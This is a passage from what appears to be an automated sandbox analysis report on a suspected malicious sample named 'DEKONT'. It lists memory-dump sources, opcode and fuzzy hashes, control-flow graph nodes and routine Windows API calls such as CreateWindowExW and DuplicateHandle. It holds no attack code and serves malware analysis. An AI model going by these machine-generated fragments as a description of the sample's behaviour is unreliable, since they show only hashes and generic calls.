                                                              • Instruction Fuzzy Hash: C581A6B4E00219DFDB14DFA9D994A9DBBF2BF88305F24806AE409AB365DB309D41CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32bdd2b43ce1eafdfa4b7c71064b333976be7c9b1d1f22abd4d2053f81a7990d
                                                              • Instruction ID: 2c27ecf62b62ee01501c3c49d2d10df720a4a861894d9b807af7f3dd31f1a608
                                                              • Opcode Fuzzy Hash: 32bdd2b43ce1eafdfa4b7c71064b333976be7c9b1d1f22abd4d2053f81a7990d
                                                              • Instruction Fuzzy Hash: D6719571E016288FEB68CF6AC944B9DFBF2AF89300F14C1AAD40DA7255DB305A85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10bbe502e261d0f92292c410253e5d41522ce52b04251090e102593435b96ad5
                                                              • Instruction ID: b61b34109dfc157a9d836732a8116f5b1859622a305b0b56ecb37488e03ffabd
                                                              • Opcode Fuzzy Hash: 10bbe502e261d0f92292c410253e5d41522ce52b04251090e102593435b96ad5
                                                              • Instruction Fuzzy Hash: 32718571D016188FEB68CF6AC954B9DBBF2AF89300F14C1AAD50DA7254DB345A85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9fafc1c7952db61c43c0ece7bbca2a2e223d172cca369e248ae77b0b96d2629e
                                                              • Instruction ID: 228ecc67f6819fe21f2502424f9c3f6ab1edea71472faab35201b86e2cef29e4
                                                              • Opcode Fuzzy Hash: 9fafc1c7952db61c43c0ece7bbca2a2e223d172cca369e248ae77b0b96d2629e
                                                              • Instruction Fuzzy Hash: 9C717471E016288FEB68CF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ef335d54d10834af5b630434a93212fe470ce072bd5ee867518b5c9ea1e80bb
                                                              • Instruction ID: 49c5676bce779b1b08e2117dd0333859e1caf340e47c456415db1b4aa09475b5
                                                              • Opcode Fuzzy Hash: 9ef335d54d10834af5b630434a93212fe470ce072bd5ee867518b5c9ea1e80bb
                                                              • Instruction Fuzzy Hash: B261E9B4E00249DFDB14DFAAD984A9DBBF2FF89304F24806AD804AB365DB349945CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: da6932b50f63ed4203e0094727f3fd1675edb01e4c3cb5261661b55cb5ff7ed7
                                                              • Instruction ID: b04dcfae8b68aae8581f1f3f10b6fbd3ee400e696f3e5a1532349f234aedaa57
                                                              • Opcode Fuzzy Hash: da6932b50f63ed4203e0094727f3fd1675edb01e4c3cb5261661b55cb5ff7ed7
                                                              • Instruction Fuzzy Hash: 6541A0B0D016188BEB58DFAAC8547DEFBF2AF88300F24C069D458AB294DB755946CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 933e7cf046363454c1359fc713991eb141da11d9837c538c1279d786f081590a
                                                              • Instruction ID: 2ecb5a22a2d1ec86ed41633d175efd97f994abd630ba0003a4659d2b19565fcc
                                                              • Opcode Fuzzy Hash: 933e7cf046363454c1359fc713991eb141da11d9837c538c1279d786f081590a
                                                              • Instruction Fuzzy Hash: D04168B1D016188BEB58CF6BD95579AFBF3AFC9300F14C1AAC50CA6264DB740A868F51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf76c984b0939effc7ed22e057ededcbce2f17d44a50df9cd2e8a82e8d362a11
                                                              • Instruction ID: 1bd16944151893b9cc2d601d48e70e8d408e9a6be19cced85baa2343fd45007e
                                                              • Opcode Fuzzy Hash: cf76c984b0939effc7ed22e057ededcbce2f17d44a50df9cd2e8a82e8d362a11
                                                              • Instruction Fuzzy Hash: 09416BB1D016188BEB58CF6BC9557DAFBF3AFC8304F14C1AAC50CA6264DB740A868F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 050ba61d6763e98e9c01a486cd22d0fa5bcb3219a8e71cc08cfd24f70abc3b90
                                                              • Instruction ID: cf559cffd5a2e1fcd3aa3eda6078e8b5e4cec13421e94d579d93cb337385e007
                                                              • Opcode Fuzzy Hash: 050ba61d6763e98e9c01a486cd22d0fa5bcb3219a8e71cc08cfd24f70abc3b90
                                                              • Instruction Fuzzy Hash: 9B416B71D016188BEB58CF6BD9557D9FBF3AFC8300F14C1AAC50CA6264DB740A868F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 708037c995f6dc67b63e1e2a3f4cd1551a882acaa1c11cdefcf7f3f15aacc065
                                                              • Instruction ID: f01224aa46319f91c5d415a6df72a696193c2e26795e800784e885a6883bfd19
                                                              • Opcode Fuzzy Hash: 708037c995f6dc67b63e1e2a3f4cd1551a882acaa1c11cdefcf7f3f15aacc065
                                                              • Instruction Fuzzy Hash: 5F4179B1D016188BEB58CF6BC9557D9FAF3AFC9300F04C1AAC50CA6264DB740A868F50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2720731bd8f7a2a58cfec72f2898bd054c18f3f3ed201f1cd5da01e263e4b002
                                                              • Instruction ID: 42bf66ee7b60cc177efd673326702e1fc41bfb62303d421fba9dcffd5af8629f
                                                              • Opcode Fuzzy Hash: 2720731bd8f7a2a58cfec72f2898bd054c18f3f3ed201f1cd5da01e263e4b002
                                                              • Instruction Fuzzy Hash: 044149B1E016188BEB58CF6BC9457D9FAF3AFC8300F14C1AAC50CA6264DB740A868F50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 730499941689bcd59be81b2aecd334df270802c90ea21bbcaceaca9ea5aa355f
                                                              • Instruction ID: 9ccfdeaa04ec327ade58168e5456e19fe0bac70bc0125417e3b79f8659b0ae71
                                                              • Opcode Fuzzy Hash: 730499941689bcd59be81b2aecd334df270802c90ea21bbcaceaca9ea5aa355f
                                                              • Instruction Fuzzy Hash: 4E415AB1E016188BEB58CF6BD9557D9FBF3AFC9300F14C1AAC50CA6254DB740A868F50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 436e12974c448cd9cf26abf9bd86ce3f99d7ca91ba30f93783c0a6a0355fa9de
                                                              • Instruction ID: 47ac1def6315897328a35ad25f418aecf533c97ca2aaae12d7b8354abdb57a65
                                                              • Opcode Fuzzy Hash: 436e12974c448cd9cf26abf9bd86ce3f99d7ca91ba30f93783c0a6a0355fa9de
                                                              • Instruction Fuzzy Hash: CF4128B1E016188FEB58CF6BDD54789FAF3AFC9204F14C1AAC50CA6265DB740A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d78788108e29d5e3d9bf28a2ca9a6b5c271b1773dc5906275337615b2c13472a
                                                              • Instruction ID: 8b012245fa734e294060ec2182004f116cf4b0bcbafbb45dcf3bf887f902b653
                                                              • Opcode Fuzzy Hash: d78788108e29d5e3d9bf28a2ca9a6b5c271b1773dc5906275337615b2c13472a
                                                              • Instruction Fuzzy Hash: 6841C270E01248CBEB58DFAAD8546EEFBB2AF88300F24D12AC419AB255DB355946CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 06D04BE6
                                                              • GetCurrentThread.KERNEL32 ref: 06D04C23
                                                              • GetCurrentProcess.KERNEL32 ref: 06D04C60
                                                              • GetCurrentThreadId.KERNEL32 ref: 06D04CB9
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 6f206de121b0eaf7061b56ddac319667b12d1ccf39f21e0f36db16bb63282845
                                                              • Instruction ID: 0d6ebb05ce61ba17abe07a69c9c26c69c7d5796ea7ce65da2f9c0eb613067b62
                                                              • Opcode Fuzzy Hash: 6f206de121b0eaf7061b56ddac319667b12d1ccf39f21e0f36db16bb63282845
                                                              • Instruction Fuzzy Hash: E95178B090034ACFEB54DFAAD948B9EBBF1BF88304F20805AE409A73A0D7355944CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 06D04BE6
                                                              • GetCurrentThread.KERNEL32 ref: 06D04C23
                                                              • GetCurrentProcess.KERNEL32 ref: 06D04C60
                                                              • GetCurrentThreadId.KERNEL32 ref: 06D04CB9
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 351a9134ae649efae90a039776a44f2a88531163d95da1f9c140d9a750556c87
                                                              • Instruction ID: d42672a6fa4fb01b374427b700a0ed355edfea9fa0e72988551ecf0816d197f4
                                                              • Opcode Fuzzy Hash: 351a9134ae649efae90a039776a44f2a88531163d95da1f9c140d9a750556c87
                                                              • Instruction Fuzzy Hash: 545159B090034ACFEB54DFAAD948B9EBBF1BF88314F208019E519A73A0D7355944CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1107 6d0f6b0-6d0f6b1 1108 6d0f6b3-6d0f6c4 1107->1108 1109 6d0f687-6d0f691 1107->1109 1110 6d0f6cf-6d0f6d1 1108->1110 1111 6d0f693-6d0f6a3 1109->1111 1112 6d0f667-6d0f67c 1109->1112 1113 6d0f6d2-6d0f6d9 1110->1113 1114 6d0f6a7-6d0f6ad 1110->1114 1115 6d0f65e-6d0f663 1112->1115 1116 6d0f67e-6d0f683 1112->1116 1117 6d0f6af 1113->1117 1118 6d0f6db-6d0f6f0 1113->1118 1114->1117 1117->1107 1119 6d0f6f2-6d0f6f8 1118->1119 1120 6d0f76e-6d0f7b6 1118->1120 1119->1110 1121 6d0f6fb-6d0f718 1119->1121 1122 6d0f7c1-6d0f7c8 1120->1122 1123 6d0f7b8-6d0f7be 1120->1123 1131 6d0f71b-6d0f71d 1121->1131 1124 6d0f7d3-6d0f80b 1122->1124 1125 6d0f7ca-6d0f7d0 1122->1125 1123->1122 1127 6d0f813-6d0f872 CreateWindowExW 1124->1127 1125->1124 1129 6d0f874-6d0f87a 1127->1129 1130 6d0f87b-6d0f8b3 1127->1130 1129->1130 1141 6d0f8c0 1130->1141 1142 6d0f8b5-6d0f8b8 1130->1142 1132 6d0f71f-6d0f721 1131->1132 1135 6d0f723-6d0f725 1132->1135 1136 6d0f727-6d0f729 1132->1136 1135->1136 1138 6d0f72b-6d0f72d 1136->1138 1139 6d0f72f-6d0f730 call 6d0d84c 1136->1139 1138->1139 1143 6d0f731-6d0f732 1139->1143 1145 6d0f8c1 1141->1145 1142->1141 1144 6d0f734 1143->1144 1149 6d0f734 call 6d0f6b0 1144->1149 1150 6d0f734 call 6d0f700 1144->1150 1151 6d0f734 call 6d0d84c 1144->1151 1145->1145 1146 6d0f735-6d0f745 1146->1131 1147 6d0f747-6d0f749 1146->1147 1147->1132 1148 6d0f74b-6d0f76d 1147->1148 1148->1120 1149->1146 1150->1146 1151->1146
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D0F862
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: b3e6d9f193286afaf9dd5c78f020ba10fd4302737d77837c7ae78c9ec0812977
                                                              • Instruction ID: f07d552365938a49860778bae55762e0c0e18a2e76bd7ce0e375a695950b94a6
                                                              • Opcode Fuzzy Hash: b3e6d9f193286afaf9dd5c78f020ba10fd4302737d77837c7ae78c9ec0812977
                                                              • Instruction Fuzzy Hash: AC814071C09389AFDB52CFA5C850ACDBFB1EF4A300F25819BE854AB262C7359845CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1152 6d0d168-6d0d177 1153 6d0d1a3-6d0d1a7 1152->1153 1154 6d0d179-6d0d186 call 6d0c100 1152->1154 1155 6d0d1a9-6d0d1b3 1153->1155 1156 6d0d1bb-6d0d1fc 1153->1156 1159 6d0d188 1154->1159 1160 6d0d19c 1154->1160 1155->1156 1163 6d0d209-6d0d217 1156->1163 1164 6d0d1fe-6d0d206 1156->1164 1207 6d0d18e call 6d0d400 1159->1207 1208 6d0d18e call 6d0d3f1 1159->1208 1160->1153 1166 6d0d219-6d0d21e 1163->1166 1167 6d0d23b-6d0d23d 1163->1167 1164->1163 1165 6d0d194-6d0d196 1165->1160 1170 6d0d2d8-6d0d398 1165->1170 1168 6d0d220-6d0d227 call 6d0c10c 1166->1168 1169 6d0d229 1166->1169 1171 6d0d240-6d0d247 1167->1171 1173 6d0d22b-6d0d239 1168->1173 1169->1173 1202 6d0d3a0-6d0d3cb GetModuleHandleW 1170->1202 1203 6d0d39a-6d0d39d 1170->1203 1174 6d0d254-6d0d25b 1171->1174 1175 6d0d249-6d0d251 1171->1175 1173->1171 1177 6d0d268-6d0d271 call 6d05880 1174->1177 1178 6d0d25d-6d0d265 1174->1178 1175->1174 1183 6d0d273-6d0d27b 1177->1183 1184 6d0d27e-6d0d283 1177->1184 1178->1177 1183->1184 1185 6d0d2a1-6d0d2ae 1184->1185 1186 6d0d285-6d0d28c 1184->1186 1193 6d0d2b0-6d0d2ce 1185->1193 1194 6d0d2d1-6d0d2d7 1185->1194 1186->1185 1188 6d0d28e-6d0d29e call 6d0a074 call 6d0c11c 1186->1188 1188->1185 1193->1194 1204 6d0d3d4-6d0d3e8 1202->1204 1205 6d0d3cd-6d0d3d3 1202->1205 1203->1202 1205->1204 1207->1165 1208->1165
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 60e227f937bc276fd58d018ec9248c7794b24717f42c83e9b655970873998f52
                                                              • Instruction ID: 84a2e66d9fcbc1033e3ff9924c7225345b2b0dbc3fe184755e30fd936c81dfb7
                                                              • Opcode Fuzzy Hash: 60e227f937bc276fd58d018ec9248c7794b24717f42c83e9b655970873998f52
                                                              • Instruction Fuzzy Hash: 80712770A00B058FE764DF6AD45479ABBF2FF88200F008A2ED496D7B90DB75E845CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1209 6d0d84c-6d0f7b6 1211 6d0f7c1-6d0f7c8 1209->1211 1212 6d0f7b8-6d0f7be 1209->1212 1213 6d0f7d3-6d0f872 CreateWindowExW 1211->1213 1214 6d0f7ca-6d0f7d0 1211->1214 1212->1211 1216 6d0f874-6d0f87a 1213->1216 1217 6d0f87b-6d0f8b3 1213->1217 1214->1213 1216->1217 1221 6d0f8c0 1217->1221 1222 6d0f8b5-6d0f8b8 1217->1222 1223 6d0f8c1 1221->1223 1222->1221 1223->1223
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D0F862
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: c4502af9c12e466bab10488cde6fca5de22d2697feffdcc322fe510a89d4e432
                                                              • Instruction ID: 98fc28483ad53c4cc53faa966d03c3ccdd82c680967ed7271f166017f8515849
                                                              • Opcode Fuzzy Hash: c4502af9c12e466bab10488cde6fca5de22d2697feffdcc322fe510a89d4e432
                                                              • Instruction Fuzzy Hash: DF51A2B1D00349DFEB14CF9AC884ADEBBB5FF88310F64852AE819AB250D7759845CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1224 5b2bfc4-5b2bfc7 1225 5b2bf79-5b2bf86 1224->1225 1226 5b2bfc9-5b2bffa 1224->1226 1231 5b2bf88 1225->1231 1232 5b2bf8f-5b2bf90 1225->1232 1231->1232 1234 5b2bf43-5b2bf55 1231->1234 1235 5b2bfff-5b2c00d 1232->1235 1236 5b2bf57 1234->1236 1237 5b2bf5e-5b2bf5f 1234->1237 1247 5b2c015-5b2c019 1235->1247 1236->1232 1236->1234 1236->1237 1239 5b2bf02-5b2bf18 1236->1239 1240 5b2bef3-5b2bf00 1236->1240 1241 5b2be86-5b2bea6 1236->1241 1242 5b2beba-5b2bed0 1236->1242 1243 5b2bea8-5b2beb5 1236->1243 1244 5b2be79-5b2be7f LdrInitializeThunk 1236->1244 1245 5b2bf3d-5b2bf3e 1236->1245 1237->1235 1250 5b2bf1a 1239->1250 1251 5b2bf1f-5b2bf2c 1239->1251 1240->1245 1241->1242 1241->1243 1248 5b2bed2 1242->1248 1249 5b2bed7-5b2bef1 1242->1249 1243->1245 1244->1241 1245->1247 1252 5b2c021-5b2c02b 1247->1252 1253 5b2c01b-5b2c020 1247->1253 1248->1249 1249->1239 1249->1240 1250->1251 1254 5b2bf33-5b2bf3b 1251->1254 1255 5b2bf2e 1251->1255 1253->1252 1254->1245 1255->1254
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f590d77437f81365d8c41de6efcb4c347a3a46d7a3d2e99a1e16fe5352b899c1
                                                              • Instruction ID: 86dc6ad1459fba3713df33346643e12402f56b6e955ab7ab13ca64a74080ceb9
                                                              • Opcode Fuzzy Hash: f590d77437f81365d8c41de6efcb4c347a3a46d7a3d2e99a1e16fe5352b899c1
                                                              • Instruction Fuzzy Hash: 11412874A08619DBDB14CF98C4C4AEDFBB2FF48310F249199E419A7385CB31A986CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1257 5b2bf64-5b2bf6e 1258 5b2bf70-5b2bf78 1257->1258 1259 5b2bf7a-5b2bf7d 1257->1259 1258->1259 1260 5b2bf80-5b2bf86 1258->1260 1259->1260 1261 5b2bf88 1260->1261 1262 5b2bf8f-5b2bf90 1260->1262 1261->1262 1263 5b2bf43-5b2bf55 1261->1263 1264 5b2bfff-5b2c00d 1262->1264 1265 5b2bf57 1263->1265 1266 5b2bf5e-5b2bf5f 1263->1266 1275 5b2c015-5b2c019 1264->1275 1265->1262 1265->1263 1265->1266 1267 5b2bf02-5b2bf18 1265->1267 1268 5b2bef3-5b2bf00 1265->1268 1269 5b2be86-5b2bea6 1265->1269 1270 5b2beba-5b2bed0 1265->1270 1271 5b2bea8-5b2beb5 1265->1271 1272 5b2be79-5b2be7f LdrInitializeThunk 1265->1272 1273 5b2bf3d-5b2bf3e 1265->1273 1266->1264 1278 5b2bf1a 1267->1278 1279 5b2bf1f-5b2bf2c 1267->1279 1268->1273 1269->1270 1269->1271 1276 5b2bed2 1270->1276 1277 5b2bed7-5b2bef1 1270->1277 1271->1273 1272->1269 1273->1275 1280 5b2c021-5b2c02b 1275->1280 1281 5b2c01b-5b2c020 1275->1281 1276->1277 1277->1267 1277->1268 1278->1279 1282 5b2bf33-5b2bf3b 1279->1282 1283 5b2bf2e 1279->1283 1281->1280 1282->1273 1283->1282
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9143700b02ac96f906d701c2c0cd6b48f7bf5228060783f4640877161067b5a
                                                              • Instruction ID: 7ea20e47a1a715d0528593c4eba73570d10e09ceb5c29e7495f81feb3ea7306b
                                                              • Opcode Fuzzy Hash: f9143700b02ac96f906d701c2c0cd6b48f7bf5228060783f4640877161067b5a
                                                              • Instruction Fuzzy Hash: B9411774D08619DFDB14CF98D4C4AEDBBB2FF48314F248198E419A7291CB31A986CF60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1305 5b2be18-5b2be4e 1306 5b2be50 1305->1306 1307 5b2be55-5b2be7f LdrInitializeThunk 1305->1307 1306->1307 1309 5b2be86-5b2bea6 1307->1309 1310 5b2beba-5b2bed0 1309->1310 1311 5b2bea8-5b2beb5 1309->1311 1313 5b2bed2 1310->1313 1314 5b2bed7-5b2bef1 1310->1314 1312 5b2bf3d-5b2c019 1311->1312 1318 5b2c021-5b2c02b 1312->1318 1319 5b2c01b-5b2c020 1312->1319 1313->1314 1316 5b2bf02-5b2bf18 1314->1316 1317 5b2bef3-5b2bf00 1314->1317 1320 5b2bf1a 1316->1320 1321 5b2bf1f-5b2bf2c 1316->1321 1317->1312 1319->1318 1320->1321 1322 5b2bf33-5b2bf3b 1321->1322 1323 5b2bf2e 1321->1323 1322->1312 1323->1322
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c28d3bc6a473be3280b82eac0df22b991352f8cfd37378f38e0b67489dcd7910
                                                              • Instruction ID: d6d589752bc24613fa0bd1d7e6f921469b02a1db96a1abcfa977906ff1246f17
                                                              • Opcode Fuzzy Hash: c28d3bc6a473be3280b82eac0df22b991352f8cfd37378f38e0b67489dcd7910
                                                              • Instruction Fuzzy Hash: A22129B1D012189BDB14CFA9D884AEEFBF6FF88310F249529E455A7295C770194ACF60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1325 6d04834-6d04e44 DuplicateHandle 1327 6d04e46-6d04e4c 1325->1327 1328 6d04e4d-6d04e6a 1325->1328 1327->1328
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D04D76,?,?,?,?,?), ref: 06D04E37
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: a8b436c63d34ec38d938272ea49ba15ec81e8108c036fe4f2f5aaf1030c018c2
                                                              • Instruction ID: d932f8fd1282b34a0268070f8846d78bb1b20b3dc157f1fdac976333cb59003d
                                                              • Opcode Fuzzy Hash: a8b436c63d34ec38d938272ea49ba15ec81e8108c036fe4f2f5aaf1030c018c2
                                                              • Instruction Fuzzy Hash: DA21E5B5900249DFDB10CF9AD884BDEBBF8FB48310F14841AE954A3350D374A950CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
